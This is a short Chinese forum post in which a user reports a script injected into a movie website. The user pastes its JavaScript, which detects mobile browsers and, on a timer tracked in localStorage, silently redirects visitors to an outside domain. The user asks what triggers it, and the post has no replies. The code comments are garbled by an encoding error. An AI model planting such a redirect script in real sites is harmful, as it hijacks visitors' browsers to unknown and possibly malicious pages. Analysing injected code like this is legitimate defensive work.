电影 gqc.ink 植入的url https://abyss-static.anei.tv/js/adcgys.js function getMobileType() { var ua = window.navigator.userAgent; //navigator.appVersion return { mobile: !!ua.match(/AppleWebKit.*Mobile.*/), //鏄惁涓虹Щ鍔ㄧ粓绔� ios: !!ua.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios缁堢 android: ua.indexOf(“Android”) > -1 || ua.indexOf(“Linux”) > -1, //android缁堢鎴栬€卽c娴忚鍣� iPhone: ua.indexOf(“iPhone”) > -1 || ua.indexOf(“Mac”) > -1, //鏄惁涓篿Phone鎴栬€匭QHD娴忚鍣� iPad: ua.indexOf(“iPad”) > -1, //鏄惁iPad trident: ua.indexOf(“Trident”) > -1, //IE鍐呮牳 presto: ua.indexOf(“Presto”) > -1, //opera鍐呮牳 webKit: ua.indexOf(“AppleWebKit”) > -1, //鑻规灉銆佽胺姝屽唴鏍� gecko: ua.indexOf(“Gecko”) > -1 && ua.indexOf(“KHTML”) == -1, //鐏嫄鍐呮牳 weixin: ua.indexOf(“MicroMessenger”) > -1, //鏄惁寰俊 ua.match(/MicroMessenger/i) == “micromessenger”, }; } var jumpurl = “https://hn.ci3xg.com/1022.html”; var jumpkey = window.location.hostname + “_adcgys_jmup_time”; setInterval(function () { var timestamp = new Date().valueOf(); var jmup_time = parseInt(window.localStorage.getItem(jumpkey)); if (isNaN(jmup_time) || timestamp – jmup_time > 2 * 60 * 60 * 1000) { if (getMobileType().mobile) { setTimeout(function () { window.location.href = jumpurl; }, 3000); window.localStorage.setItem(jumpkey, new Date().valueOf()); } else { setTimeout(function () { window.location.href = jumpurl; }, 30000); window.localStorage.setItem(jumpkey, new Date().valueOf()); } } }, 1000);复制代码 会跳转刀https://hn.ci3xg.com/1022.html 还没看到哪里触发这个js
没有回复内容